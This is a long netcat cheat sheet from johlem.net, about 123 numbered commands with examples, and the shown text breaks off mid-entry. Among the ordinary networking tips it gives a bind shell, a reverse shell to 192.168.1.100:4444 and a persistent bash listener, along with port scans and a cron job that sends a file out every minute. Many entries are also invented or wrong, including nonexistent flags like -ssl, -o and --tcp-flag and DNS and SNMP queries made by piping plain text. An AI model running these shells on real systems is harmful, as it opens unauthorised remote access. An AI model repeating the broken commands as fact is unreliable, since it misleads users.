/ _ \ \_\(_)/_/ more on JOHLEM.NET _//"\\_ / \ 0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0 ############################################# # NETCAT CHEAT SHEET # ############################################# Netcat (nc) is a versatile networking utility which reads and writes data across network connections, using the TCP/IP protocol. 1. Basic TCP Connect Command: nc [destination] [port] Description: Creates a TCP connection to the specified destination and port. Example: nc example.com 80 Expected Result: Opens a TCP connection to example.com on port 80. 2. Listen Mode Command: nc -l [port] Description: Listens for incoming connections on the specified port. Example: nc -l 1234 Expected Result: Listens on port 1234 for incoming connections. 3. Send a File Command: nc [destination] [port] < [file] Description: Sends a file to a specified destination and port. Example: nc example.com 80 < file.txt Expected Result: Sends 'file.txt' to example.com on port 80. 4. Receive a File Command: nc -l [port] > [file] Description: Listens on a port and writes incoming data to a file. Example: nc -l 1234 > file.txt Expected Result: Listens on port 1234 and writes incoming data to 'file.txt'. 5. UDP Mode Command: nc -u [destination] [port] Description: Uses UDP instead of the default TCP. Example: nc -u example.com 1234 Expected Result: Sends a UDP packet to example.com on port 1234. 6. Verbose Mode Command: nc -v [destination] [port] Description: Provides more detailed output. Example: nc -v example.com 80 Expected Result: Connects to example.com on port 80 with verbose output. 7. Scan Multiple Ports Command: nc -z [destination] [port-range] Description: Scans a range of ports at the destination. Example: nc -z example.com 20-30 Expected Result: Scans ports 20 through 30 on example.com. 8. Specify Source Port Command: nc -p [source port] [destination] [port] Description: Specifies the source port to use. Example: nc -p 31337 example.com 80 Expected Result: Connects to example.com on port 80 using source port 31337. 9. Enable SSL Command: nc -ssl [destination] [port] Description: Connects using SSL encryption. Example: nc -ssl example.com 443 Expected Result: Establishes a secure SSL connection to example.com on port 443. 10. Execute a Command Command: nc -e /bin/bash [destination] [port] Description: Executes a command upon connection. Example: nc -e /bin/bash example.com 1234 Expected Result: Executes '/bin/bash' upon connecting to example.com on port 1234. 11. IPv6 Address Command: nc -6 [destination] [port] Description: Specifies the use of IPv6 addresses. Example: nc -6 example.com 80 Expected Result: Connects to an IPv6 address of example.com on port 80. 12. Timeout Command: nc -w [seconds] [destination] [port] Description: Sets a timeout for connections. Example: nc -w 5 example.com 80 Expected Result: Attempts to connect to example.com on port 80 and times out after 5 seconds. 13. Bind Shell Command: nc -lvp [port] -e /bin/bash Description: Creates a bind shell listening on the specified port. Example: nc -lvp 4444 -e /bin/bash Expected Result: Listens on port 4444 and executes /bin/bash upon connection. 14. Reverse Shell Command: nc [destination] [port] -e /bin/bash Description: Connects back to the specified destination and port, creating a reverse shell. Example: nc 192.168.1.100 4444 -e /bin/bash Expected Result: Connects back to 192.168.1.100:4444 and provides a shell. 15. Port Redirection Command: nc -lvp [port] | nc [destination] [port] Description: Redirects traffic from one port to another destination and port. Example: nc -lvp 8080 | nc 192.168.1.100 80 Expected Result: Redirects traffic from local port 8080 to 192.168.1.100 on port 80. 16. Proxy with Netcat Command: nc -lvp [port] -c 'nc [destination] [port]' Description: Sets up a simple proxy to forward traffic. Example: nc -lvp 8080 -c 'nc example.com 80' Expected Result: Forwards traffic from local port 8080 to example.com on port 80. 17. Chat Server Command: nc -lvp [port] Description: Sets up a basic chat server on the specified port. Example: nc -lvp 1234 Expected Result: Anyone connecting to port 1234 can chat. 18. Hex Dump Command: nc [destination] [port] | hexdump Description: Shows the hex dump of the traffic. Example: nc example.com 80 | hexdump Expected Result: Displays the hex dump of traffic to example.com on port 80. 19. Banner Grabbing Command: echo "" | nc -vn [destination] [port] Description: Grabs the banner of a service. Example: echo "" | nc -vn example.com 80 Expected Result: Displays the banner of the service running on example.com:80. 20. Persistent Listening Command: nc -lkv [port] Description: Listens persistently on the specified port. Example: nc -lkv 1234 Expected Result: Keeps listening on port 1234 even after connections are closed. 21. Combine Netcat with Other Commands Command: nc [destination] [port] | grep 'something' Description: Pipes the output of Netcat to another command for further processing. Example: nc example.com 80 | grep 'HTML' Expected Result: Filters the output for lines containing 'HTML'. 22. Network Testing with Data Transfer Command: yes | nc [destination] [port] Description: Sends a continuous stream of data for testing. Example: yes | nc example.com 80 Expected Result: Sends a continuous stream of 'y' to example.com on port 80. 23. Connect to Multiple Ports Simultaneously Command: nc -v -z [destination] [port1] [port2] [...] Description: Attempts to connect to multiple ports at once. Example: nc -v -z example.com 80 443 8080 Expected Result: Scans ports 80, 443, and 8080 on example.com. 24. Quiet Mode Command: nc -q [time] [destination] [port] Description: Suppresses output and sets a timeout for quitting after EOF. Example: nc -q 1 example.com 80 Expected Result: Connects to example.com on port 80, suppresses output, and quits after 1 second of inactivity. 25. Listening without DNS Name Resolution Command: nc -lnvp [port] Description: Listens on a port without DNS name resolution. Example: nc -lnvp 1234 Expected Result: Listens on port 1234 without resolving DNS names. 26. Zero-I/O Mode Command: nc -zv [destination] [port] Description: Scans without sending any data. Example: nc -zv example.com 80 Expected Result: Scans port 80 on example.com without sending data. 27. Random Source Port Command: nc -r [destination] [port] Description: Uses a random source port for the connection. Example: nc -r example.com 80 Expected Result: Connects to example.com on port 80 from a random source port. 28. Keep-Alive Signal Command: nc -o [destination] [port] Description: Sends keep-alive packets on the connection. Example: nc -o example.com 80 Expected Result: Keeps the connection to example.com on port 80 alive. 29. Specify Network Interface Command: nc -s [source IP] [destination] [port] Description: Specifies the network interface to use for the connection. Example: nc -s 192.168.1.10 example.com 80 Expected Result: Connects to example.com on port 80 using the 192.168.1.10 interface. 30. Netcat as a Port Scanner Command: nc -zv [destination] [port-range] Description: Scans a range of ports at the destination. Example: nc -zv example.com 1-65535 Expected Result: Scans all ports from 1 to 65535 on example.com. 31. Delay Between Connections Command: nc -i [seconds] [destination] [port] Description: Specifies a delay between read/write operations. Example: nc -i 5 example.com 80 Expected Result: Connects to example.com on port 80 with a 5-second delay between operations. 32. Netcat with Nmap Command: nmap -p [port] --script=ncat [destination] Description: Integrates Netcat capabilities with Nmap for advanced scanning. Example: nmap -p 80 --script=ncat example.com Expected Result: Uses Nmap to scan port 80 on example.com with Netcat scripts. 33. TCP Keepalive Command: nc -o [destination] [port] Description: Enables TCP keepalive probes. Example: nc -o example.com 80 Expected Result: Keeps the TCP connection to example.com on port 80 alive. 34. Source Port Range Command: nc -p [source-port-range] [destination] [port] Description: Specifies a range of source ports to use for the connection. Example: nc -p 1000-2000 example.com 80 Expected Result: Connects to example.com on port 80 using a source port between 1000 and 2000. 35. Netcat with OpenSSL Command: nc -ssl [destination] [port] Description: Uses Netcat with OpenSSL for encrypted connections. Example: nc -ssl example.com 443 Expected Result: Establishes a secure SSL connection to example.com on port 443. 36. Broadcast Mode Command: nc -u -b [broadcast-address] [port] Description: Sends data to broadcast addresses using UDP. Example: nc -u -b 192.168.1.255 1234 Expected Result: Sends UDP packets to the broadcast address 192.168.1.255 on port 1234. 37. Netcat with Scripting Command: echo 'commands' | nc [destination] [port] Description: Automates tasks by sending scripted commands. Example: echo 'GET / HTTP/1.1\r\n\r\n' | nc example.com 80 Expected Result: Automates an HTTP GET request to example.com on port 80. 38. IPv4 and IPv6 Dual Support Command: nc -4 [destination] [port]; nc -6 [destination] [port] Description: Supports both IPv4 and IPv6 in separate connections. Example: nc -4 example.com 80; nc -6 example.com 80 Expected Result: Connects to example.com on port 80 using both IPv4 and IPv6. 39. Rate-Limiting Connections Command: nc -i [seconds] [destination] [port] Description: Limits the rate of connections by introducing delay. Example: nc -i 1 example.com 80 Expected Result: Connects to example.com on port 80 with a 1-second delay between each packet. 40. Custom TCP Flags Command: nc --tcp-flag [flag] [destination] [port] Description: Sets custom TCP flags in packets (requires special Netcat versions). Example: nc --tcp-flag SYN example.com 80 Expected Result: Sends a TCP packet with the SYN flag to example.com on port 80. 41. DNS Querying Command: nc -u [DNS-server] 53 Description: Uses Netcat for simple DNS queries over UDP. Example: echo 'query' | nc -u dns.example.com 53 Expected Result: Sends a DNS query to dns.example.com on port 53. 42. Netcat as a Web Server Command: nc -lvp [port] > [file] Description: Sets up a basic web server that writes requests to a file. Example: nc -lvp 80 > requests.txt Expected Result: Listens on port 80 and writes incoming HTTP requests to 'requests.txt'. 43. Transfer Binary Files Command: nc [destination] [port] < [binary-file] Description: Transfers binary files to a specified destination. Example: nc example.com 1234 < image.jpg Expected Result: Sends 'image.jpg' to example.com on port 1234. 44. Encrypted File Transfer Command: openssl enc -aes-256-cbc -salt -in [file] | nc [destination] [port] Description: Sends an encrypted file using OpenSSL and Netcat. Example: openssl enc -aes-256-cbc -salt -in secret.txt | nc example.com 1234 Expected Result: Sends encrypted 'secret.txt' to example.com on port 1234. 45. Netcat with Logging Command: nc -lvp [port] | tee log.txt Description: Sets up Netcat to listen and log the data to a file. Example: nc -lvp 1234 | tee log.txt Expected Result: Listens on port 1234 and logs all data to 'log.txt'. 46. Command Execution on Connection Command: nc -lvp [port] -c 'command' Description: Executes a specified command upon establishing a connection. Example: nc -lvp 1234 -c 'date' Expected Result: Listens on port 1234 and executes 'date' command upon connection. 47. UDP Data Transfer Command: nc -u [destination] [port] < [file] Description: Transfers data over UDP. Example: nc -u example.com 1234 < data.txt Expected Result: Sends 'data.txt' to example.com on port 1234 using UDP. 48. Persistent Server with Command Execution Command: nc -lkvp [port] -e '/bin/bash' Description: Creates a persistent server that executes a command (e.g., bash). Example: nc -lkvp 4444 -e '/bin/bash' Expected Result: Persistently listens on port 4444 and executes '/bin/bash' upon connection. 49. IPv6 Specific Listening Command: nc -lvp [port] -6 Description: Listens for IPv6 connections on a specified port. Example: nc -lvp 1234 -6 Expected Result: Listens for IPv6 connections on port 1234. 50. Relay Data Between Ports Command: nc -lvp [port1] | nc [destination] [port2] Description: Relays data between two ports. Example: nc -lvp 1234 | nc 192.168.1.100 5678 Expected Result: Relays data from local port 1234 to 192.168.1.100 on port 5678. 51. Custom Banner on Connect Command: nc -lvp [port] -c 'echo "Welcome to Netcat"' Description: Displays a custom banner when a connection is established. Example: nc -lvp 1234 -c 'echo "Welcome to Netcat"' Expected Result: Shows "Welcome to Netcat" upon connecting to port 1234. 52. Netcat for File Integrity Command: nc [destination] [port] < [file] | md5sum Description: Transfers a file and checks its integrity using md5sum. Example: nc example.com 1234 < file.txt | md5sum Expected Result: Sends 'file.txt' to example.com on port 1234 and displays its MD5 checksum. 53. Netcat with SSH Tunneling Command: ssh -L [local-port]:localhost:[remote-port] [user]@[remote-host] -f -N; nc localhost [local-port] Description: Uses SSH tunneling to securely connect to a remote Netcat listener. Example: ssh -L 9000:localhost:1234 user@example.com -f -N; nc localhost 9000 Expected Result: Securely connects to a Netcat listener on example.com through an SSH tunnel. 54. Transfer and Execute a Script Command: nc [destination] [port] < [script.sh] | /bin/bash Description: Transfers a script and executes it upon arrival. Example: nc example.com 1234 < script.sh | /bin/bash Expected Result: Sends 'script.sh' to example.com on port 1234 and executes it. 55. Netcat as a Time Server Command: nc -lvp [port] -c 'date' Description: Sets up Netcat as a simple time server. Example: nc -lvp 1234 -c 'date' Expected Result: Responds with the current server time when connected to port 1234. 56. Netcat with Xinetd Command: Set up a service in /etc/xinetd.d/ and use nc as a handler. Description: Integrates Netcat with Xinetd for enhanced functionality. Example: Service configuration in /etc/xinetd.d/nc_service Expected Result: Netcat service managed by Xinetd. 57. Netcat as a TCP Relay Command: nc -lvp [port1] | nc -lvp [port2] Description: Sets up Netcat as a TCP relay between two ports. Example: nc -lvp 1234 | nc -lvp 5678 Expected Result: Relays TCP traffic from port 1234 to port 5678. 58. Netcat for Network Benchmarking Command: time echo "GET /" | nc [destination] [port] Description: Measures the response time of a network service. Example: time echo "GET /" | nc example.com 80 Expected Result: Outputs the time taken to receive a response from example.com on port 80. 59. Netcat with FIFOs Command: mkfifo /tmp/fifo; nc [destination] [port] < /tmp/fifo | nc -lvp [port] > /tmp/fifo Description: Uses named pipes (FIFOs) for complex data routing. Example: mkfifo /tmp/fifo; nc example.com 1234 < /tmp/fifo | nc -lvp 1234 > /tmp/fifo Expected Result: Sets up a bidirectional data flow using FIFOs and Netcat. 60. Netcat for Remote System Monitoring Command: nc -lvp [port] -c 'vmstat -n 1' Description: Monitors system performance remotely via Netcat. Example: nc -lvp 1234 -c 'vmstat -n 1' Expected Result: Provides continuous system performance data when connected to port 1234. 61. Netcat with Compression Command: tar czf - [directory] | nc [destination] [port] Description: Transfers a compressed directory. Example: tar czf - /path/to/dir | nc example.com 1234 Expected Result: Sends a compressed version of the directory to example.com on port 1234. 62. Remote File Editing Command: nc -lvp [port] > [file]; vi [file]; nc [destination] [port] < [file] Description: Receives a file, allows for editing, and then sends it back. Example: nc -lvp 1234 > file.txt; vi file.txt; nc example.com 1234 < file.txt Expected Result: Edits 'file.txt' received from a client and sends the edited file back. 63. Netcat with Cron for Scheduled Tasks Command: (crontab -l; echo "* * * * * nc [destination] [port] < [file]") | crontab - Description: Schedules regular tasks with Netcat using Cron. Example: (crontab -l; echo "* * * * * nc example.com 1234 < file.txt") | crontab - Expected Result: Sends 'file.txt' to example.com on port 1234 every minute. 64. Netcat for Remote Logging Command: tail -f [log file] | nc [destination] [port] Description: Forwards log files in real-time to a remote location. Example: tail -f /var/log/syslog | nc example.com 1234 Expected Result: Streams the syslog file to example.com on port 1234 in real-time. 65. Netcat as a Packet Analyzer Command: nc -lvp [port] | tcpdump -r - Description: Captures and analyzes packets using tcpdump. Example: nc -lvp 1234 | tcpdump -r - Expected Result: Captures packets on port 1234 and analyzes them with tcpdump. 66. Encrypted Chat with Netcat Command: nc -lvp [port] | openssl enc -aes-256-cbc -d; openssl enc -aes-256-cbc -e | nc [destination] [port] Description: Sets up an encrypted chat session. Example: nc -lvp 1234 | openssl enc -aes-256-cbc -d; openssl enc -aes-256-cbc -e | nc example.com 1234 Expected Result: Establishes an encrypted chat session with example.com on port 1234. 67. Netcat with Netstat for Connection Monitoring Command: while true; do netstat -an | grep '[port]'; sleep 5; done | nc [destination] [port] Description: Monitors port connections and sends the output to a remote host. Example: while true; do netstat -an | grep '1234'; sleep 5; done | nc example.com 1234 Expected Result: Continuously monitors connections on port 1234 and reports to example.com. 68. Multi-Client Chat Server Command: nc -lvp [port] -c 'nc [destination] [port]' Description: Sets up a multi-client chat server. Example: nc -lvp 1234 -c 'nc 192.168.1.100 1234' Expected Result: Allows multiple clients to connect and chat through the server. 69. Netcat for Remote Hardware Control Command: nc -lvp [port] -c 'echo "1" > /sys/class/gpio/gpio23/value' Description: Controls hardware remotely (e.g., GPIO on a Raspberry Pi). Example: nc -lvp 1234 -c 'echo "1" > /sys/class/gpio/gpio23/value' Expected Result: Sets the GPIO23 pin to high on a remote Raspberry Pi when connected. 70. Netcat with Python for Enhanced Scripting Command: nc -lvp [port] -e 'python3 -c "import this"' Description: Executes Python scripts upon connection. Example: nc -lvp 1234 -e 'python3 -c "import this"' Expected Result: Executes a Python script when a client connects to port 1234. 71. Dynamic Port Forwarding with Netcat Command: ssh -D [local-port] [user]@[remote-host] -f -N; nc -x localhost:[local-port] [destination] [port] Description: Uses SSH for dynamic port forwarding and connects via Netcat. Example: ssh -D 8080 user@example.com -f -N; nc -x localhost:8080 example2.com 1234 Expected Result: Dynamically forwards ports to example2.com:1234 via example.com. 72. Netcat for Database Querying Command: echo "SELECT * FROM table;" | nc [db-host] [db-port] Description: Sends a SQL query to a database server using Netcat. Example: echo "SELECT * FROM users;" | nc db.example.com 3306 Expected Result: Queries the 'users' table on the MySQL server at db.example.com:3306. 73. Netcat with ARP for Network Scanning Command: arp-scan --interface=eth0 --localnet | nc [destination] [port] Description: Scans the local network for devices and sends the report via Netcat. Example: arp-scan --interface=eth0 --localnet | nc example.com 1234 Expected Result: Scans the local network on eth0 and sends the results to example.com on port 1234. 74. Netcat for HTTP POST Requests Command: echo -e "POST /path HTTP/1.1\r\nHost: example.com\r\nContent-Length: [length]\r\n\r\n[data]" | nc example.com 80 Description: Sends an HTTP POST request to a web server. Example: echo -e "POST /submit HTTP/1.1\r\nHost: example.com\r\nContent-Length: 11\r\n\r\nhello=world" | nc example.com 80 Expected Result: Sends a POST request with data 'hello=world' to example.com. 75. Netcat for Remote Audio Streaming Command: arecord -f cd - | nc -lvp [port] Description: Streams live audio from a microphone over the network. Example: arecord -f cd - | nc -lvp 1234 Expected Result: Streams live audio from the microphone to clients connected on port 1234. 76. Netcat with Socat for Advanced Relay Command: socat TCP-LISTEN:[port1],reuseaddr,fork TCP:[destination]:[port2] Description: Uses Socat in conjunction with Netcat for advanced TCP relay. Example: socat TCP-LISTEN:1234,reuseaddr,fork TCP:example.com:5678 Expected Result: Relays TCP traffic from local port 1234 to example.com on port 5678. 77. Netcat for Real-Time Text Editing Collaboration Command: nc -lvp [port] > [file]; vi [file]; nc -lvp [port] < [file] Description: Collaboratively edits a text file in real-time. Example: nc -lvp 1234 > collab.txt; vi collab.txt; nc -lvp 1234 < collab.txt Expected Result: Allows for real-time collaborative editing of 'collab.txt'. 78. Netcat for Remote Desktop Streaming Command: x11vnc -display :0 - | nc -lvp [port] Description: Streams a remote desktop session over the network. Example: x11vnc -display :0 - | nc -lvp 1234 Expected Result: Streams the desktop session of the host machine on port 1234. 79. Netcat for Encrypted File Transfer with GPG Command: gpg -c [file] | nc [destination] [port] Description: Encrypts a file with GPG and sends it over the network. Example: gpg -c secret.txt | nc example.com 1234 Expected Result: Encrypts 'secret.txt' with GPG and sends it to example.com on port 1234. 80. Netcat for SSL Tunneling Command: openssl s_server -quiet -key key.pem -cert cert.pem -port [port]; nc --ssl [destination] [port] Description: Sets up an SSL tunnel for secure communication. Example: openssl s_server -quiet -key key.pem -cert cert.pem -port 1234; nc --ssl example.com 1234 Expected Result: Creates an SSL tunnel on port 1234 and securely connects to example.com. 81. Netcat for Remote System Updates Command: nc -lvp [port] | bash Description: Receives and executes system update commands remotely. Example: echo "apt-get update && apt-get upgrade" | nc example.com 1234 Expected Result: Updates and upgrades the system on example.com listening on port 1234. 82. Netcat for Secure File Deletion Command: nc -lvp [port] | shred -u Description: Securely deletes a file received over the network. Example: nc example.com 1234 < sensitive.txt; shred -u sensitive.txt Expected Result: Securely deletes 'sensitive.txt' after sending it to example.com. 83. Netcat as a Proxy Checker Command: nc -x [proxy-server]:[proxy-port] [destination] [port] Description: Checks the functionality of a proxy server. Example: nc -x proxy.example.com:8080 example.com 80 Expected Result: Connects to example.com through the proxy server at proxy.example.com:8080. 84. Netcat for DNS Reverse Lookup Command: nc [DNS-server] 53; dig -x [IP-address] Description: Performs a reverse DNS lookup. Example: echo "set type=PTR" | nc dns.example.com 53; dig -x 192.168.1.1 Expected Result: Queries the DNS server for the hostname associated with 192.168.1.1. 85. Netcat with IPTables for Traffic Redirection Command: iptables -t nat -A PREROUTING -p tcp --dport [port1] -j REDIRECT --to-port [port2]; nc -lvp [port2] Description: Redirects incoming traffic on one port to another port using IPTables. Example: iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080; nc -lvp 8080 Expected Result: Redirects all traffic from port 80 to port 8080 and listens on port 8080. 86. Netcat for Network Throttling Testing Command: nc -lvp [port] | pv -L [rate] Description: Tests network throughput with controlled bandwidth. Example: nc -lvp 1234 | pv -L 1M Expected Result: Listens on port 1234 and limits the bandwidth to 1 Megabyte per second. 87. Netcat with OpenSSL for Certificate Retrieval Command: echo | openssl s_client -connect [destination]:[port] -showcerts | nc [log-server] [log-port] Description: Retrieves SSL certificates and logs them to a remote server. Example: echo | openssl s_client -connect example.com:443 -showcerts | nc log.example.com 1234 Expected Result: Retrieves SSL certificates from example.com and sends them to log.example.com. 88. Netcat for SIP Protocol Testing Command: echo -e "OPTIONS sip:[destination] SIP/2.0\r\nVia: SIP/2.0/[protocol] [source]:[port]\r\n" | nc [destination] [SIP-port] Description: Sends SIP OPTIONS requests for VoIP testing. Example: echo -e "OPTIONS sip:example.com SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.100:5060\r\n" | nc example.com 5060 Expected Result: Sends a SIP OPTIONS request to example.com on port 5060. 89. Netcat with Wget for File Retrieval Command: wget -O - [URL] | nc [destination] [port] Description: Retrieves a file from a URL and sends it over Netcat. Example: wget -O - http://example.com/file.txt | nc example.com 1234 Expected Result: Downloads 'file.txt' from example.com and sends it to example.com on port 1234. 90. Netcat for Remote Keyboard Input Command: nc -lvp [port] | xdotool type --file - Description: Receives text over the network and types it on a remote system. Example: echo "Hello World" | nc example.com 1234 Expected Result: Types "Hello World" on the remote system connected to example.com:1234. 91. Netcat for Custom HTTP Headers Command: printf 'GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: Value\r\n\r\n' | nc example.com 80 Description: Sends a custom HTTP request with specific headers. Example: printf 'GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: Value\r\n\r\n' | nc example.com 80 Expected Result: Sends a GET request to example.com with a custom header. 92. Netcat with Traffic Analysis using Wireshark Command: nc -lvp [port] | wireshark -k -i - Description: Captures and analyzes network traffic using Wireshark. Example: nc -lvp 1234 | wireshark -k -i - Expected Result: Captures network traffic on port 1234 and analyzes it in Wireshark. 93. Netcat for Email Sending Command: nc [mail-server] 25; HELO [hostname]; MAIL FROM:<[email]>; RCPT TO:<[recipient]>; DATA; [message]; . Description: Sends an email using the SMTP protocol. Example: nc mail.example.com 25; HELO mypc; MAIL FROM:; RCPT TO:; DATA; Hello, this is a test email; . Expected Result: Sends an email from me@example.com to friend@example.com via mail.example.com. 94. Netcat for Remote System Monitoring with Top Command: nc -lvp [port] -c 'top -b' Description: Streams the 'top' command output for remote system monitoring. Example: nc -lvp 1234 -c 'top -b' Expected Result: Streams real-time system resource usage data to a client connected on port 1234. 95. Netcat with SSH for Secure Remote Shell Command: nc -lvp [port] -c 'ssh [user]@[host]' Description: Provides a secure remote shell session over SSH. Example: nc -lvp 1234 -c 'ssh user@example.com' Expected Result: Initiates an SSH session to example.com when a client connects to port 1234. 96. Netcat for Multi-Host Port Scanning Command: nc -zv [host1] [port]; nc -zv [host2] [port] Description: Scans multiple hosts for open ports. Example: nc -zv example1.com 80; nc -zv example2.com 80 Expected Result: Checks for open port 80 on both example1.com and example2.com. 97. Netcat for File Encryption and Transfer Command: openssl aes-256-cbc -in [file] -out [file].enc; nc [destination] [port] < [file].enc Description: Encrypts a file and sends it over the network. Example: openssl aes-256-cbc -in file.txt -out file.txt.enc; nc example.com 1234 < file.txt.enc Expected Result: Encrypts 'file.txt' and sends the encrypted file to example.com on port 1234. 98. Netcat with Tar for Directory Transfer Command: tar -czf - [directory] | nc [destination] [port] Description: Transfers an entire directory over the network. Example: tar -czf - /path/to/dir | nc example.com 1234 Expected Result: Compresses and transfers '/path/to/dir' to example.com on port 1234. 99. Netcat as a Simple File Server Command: while true; do nc -lvp [port] -q 1 < [file]; done Description: Serves a file repeatedly on a specific port. Example: while true; do nc -lvp 1234 -q 1 < index.html; done Expected Result: Continuously serves 'index.html' to anyone who connects to port 1234. 100. Netcat with Nmap for Advanced Network Scanning Command: nmap -sV -p [port] [destination] | nc [log-server] [log-port] Description: Performs a service version scan with Nmap and logs the results. Example: nmap -sV -p 80 example.com | nc log.example.com 1234 Expected Result: Scans example.com for service versions on port 80 and sends the results to log.example.com. 101. Netcat for WebSocket Testing Command: echo -e "GET / HTTP/1.1\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nHost: example.com\r\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\nSec-WebSocket-Version: 13\r\n\r\n" | nc example.com 80 Description: Tests WebSocket connections and protocols. Example: echo -e "GET / HTTP/1.1\r\nUpgrade: websocket\r\nConnection: Upgrade\r\nHost: example.com\r\nSec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\nSec-WebSocket-Version: 13\r\n\r\n" | nc example.com 80 Expected Result: Initiates a WebSocket connection to example.com on port 80. 102. Netcat with Curl for HTTP/HTTPS Testing Command: curl -X POST -d 'data' http://example.com | nc [log-server] [log-port] Description: Sends HTTP/HTTPS requests using Curl and captures the response with Netcat. Example: curl -X POST -d 'data' http://example.com | nc log.example.com 1234 Expected Result: Sends a POST request to example.com and forwards the response to log.example.com. 103. Netcat for Multicast Testing Command: nc -u -lvp [port]; nc -u [multicast-address] [port] Description: Tests sending and receiving multicast traffic. Example: nc -u -lvp 1234; nc -u 224.0.0.1 1234 Expected Result: Listens for UDP multicast traffic on port 1234 and sends packets to the multicast address. 104. Netcat for SNMP Querying Command: echo 'snmpget -v1 -c public [IP] [OID]' | nc [SNMP-server] 161 Description: Queries SNMP server for information. Example: echo 'snmpget -v1 -c public 192.168.1.100 1.3.6.1.2.1.1.1.0' | nc 192.168.1.100 161 Expected Result: Retrieves SNMP information from 192.168.1.100. 105. Netcat as a Remote Script Executor Command: nc -lvp [port] -e './script.sh' Description: Executes a local script upon receiving a remote connection. Example: nc -lvp 1234 -e './script.sh' Expected Result: Executes 'script.sh' when a client connects to port 1234. 106. Netcat with FTP for File Transfer Command: nc -lvp [port] | ftp -n [FTP-server] Description: Transfers files using FTP protocol over Netcat. Example: nc -lvp 1234 | ftp -n ftp.example.com Expected Result: Starts an FTP session to ftp.example.com and listens for incoming connections on port 1234. 107. Netcat for Remote System Shutdown Command: nc -lvp [port] -c 'shutdown -h now' Description: Shuts down a system remotely upon receiving a Netcat connection. Example: nc -lvp 1234 -c 'shutdown -h now' Expected Result: Initiates a system shutdown when a connection is made to port 1234. 108. Netcat for Continuous Data Streaming Command: yes | nc [destination] [port] Description: Streams continuous data to a remote host for testing. Example: yes | nc example.com 1234 Expected Result: Sends a continuous stream of 'y' characters to example.com on port 1234. 109. Netcat for Remote Environment Variable Setting Command: nc -lvp [port] -c 'export VAR=value; bash' Description: Sets environment variables remotely and opens a shell session. Example: nc -lvp 1234 -c 'export VAR=value; bash' Expected Result: Sets an environment variable and starts a bash session when connected to port 1234. 110. Netcat with VPN Testing Command: ping [VPN-server] | nc [log-server] [log-port] Description: Tests VPN connectivity and logs results. Example: ping vpn.example.com | nc log.example.com 1234 Expected Result: Pings the VPN server at vpn.example.com and logs the results to log.example.com. 111. Netcat for Port Knocking Command: for port in [port1] [port2] [port3]; do nc -z [destination] $port; done Description: Performs port knocking to open ports on a server with a port-knocking daemon. Example: for port in 7000 8000 9000; do nc -z example.com $port; done Expected Result: Sequentially knocks on ports 7000, 8000, and 9000 on example.com. 112. Netcat for Remote Job Scheduling with At Command: echo 'nc [destination] [port] < [file]' | at [time] Description: Schedules a future job to send a file using Netcat. Example: echo 'nc example.com 1234 < backup.tar.gz' | at midnight Expected Result: Sends 'backup.tar.gz' to example.com on port 1234 at midnight. 113. Netcat with Sed for Stream Editing Command: nc -lvp [port] | sed 's/[old]/[new]/g' Description: Listens for incoming data and performs stream editing with Sed. Example: nc -lvp 1234 | sed 's/cat/dog/g' Expected Result: Replaces all occurrences of 'cat' with 'dog' in data received on port 1234. 114. Netcat for UPnP Device Discovery Command: echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: upnp:rootdevice\r\nMAN: "ssdp:discover"\r\nMX: 3\r\n\r\n' | nc -u 239.255.255.250 1900 Description: Discovers UPnP devices on the local network. Example: echo -e 'M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: upnp:rootdevice\r\nMAN: "ssdp:discover"\r\nMX: 3\r\n\r\n' | nc -u 239.255.255.250 1900 Expected Result: Sends a UPnP discovery request and receives responses from UPnP devices. 115. Netcat for Load Balancer Health Checks Command: while true; do echo "health check" | nc -lvp [port]; sleep 1; done Description: Continuously listens and responds to health check requests from a load balancer. Example: while true; do echo "health check" | nc -lvp 1234; sleep 1; done Expected Result: Periodically responds to health checks on port 1234. 116. Netcat with Grep for Keyword Alerting Command: nc -lvp [port] | grep --line-buffered '[keyword]' | while read line; do echo "Alert: $line"; done Description: Monitors incoming data for specific keywords and alerts when found. Example: nc -lvp 1234 | grep --line-buffered 'error' | while read line; do echo "Alert: $line"; done Expected Result: Alerts whenever the keyword 'error' is found in the data received on port 1234. 117. Netcat for Serial Port Communication Command: nc -lvp [port] > /dev/ttyS0; cat /dev/ttyS0 | nc [destination] [port] Description: Sends and receives data through a serial port using Netcat. Example: nc -lvp 1234 > /dev/ttyS0; cat /dev/ttyS0 | nc example.com 1234 Expected Result: Communicates with a device connected to the serial port /dev/ttyS0 and relays data. 118. Netcat for IoT Device Interfacing Command: nc -lvp [port] -c 'python3 iot_script.py' Description: Interfaces with IoT devices by executing scripts upon connection. Example: nc -lvp 1234 -c 'python3 iot_script.py' Expected Result: Runs 'iot_script.py', interfacing with an IoT device, when a client connects. 119. Netcat with SoX for Audio Processing Command: nc -lvp [port] | sox -t .wav - effects | nc [destination] [port] Description: Processes audio data with SoX and forwards it. Example: nc -lvp 1234 | sox -t .wav - echo 0.8 0.9 1000 0.3 | nc example.com 5678 Expected Result: Applies an echo effect to incoming audio and sends it to example.com:5678. 120. Netcat with ImageMagick for Image Processing Command: nc -lvp [port] | convert - -resize 50% - | nc [destination] [port] Description: Resizes images received and forwards them. Example: nc -lvp 1234 | convert - -resize 50% - | nc example.com 5678 Expected Result: Resizes incoming images to 50% of their original size and sends them to example.com:5678. 121. Netcat with Bash for Advanced Scripting Command: nc -lvp [port] -e '/bin/bash -s' < script.sh Description: Executes an advanced bash script upon receiving a connection. Example: nc -lvp 1234 -e '/bin/bash -s' < script.sh Expected Result: Runs 'script.sh' using bash when a client connects to port 1234. 122. Netcat for DNS Zone Transfer Command: echo 'ls -d [zone]' | nc [DNS-server] 53 Description: Attempts a DNS zone transfer. Example: echo 'ls -d example.com' | nc ns.example.com 53 Expected Result: Tries to transfer the zone data for 'example.com' from ns.example.com. 123. Netcat with Awk for Data Analysis Command: nc -lvp [port] | awk '/pattern/ {action}' Description: Listens for data and performs real-time analysis using Awk. Example: nc -lvp 1234 | awk '/error/ {print "Error 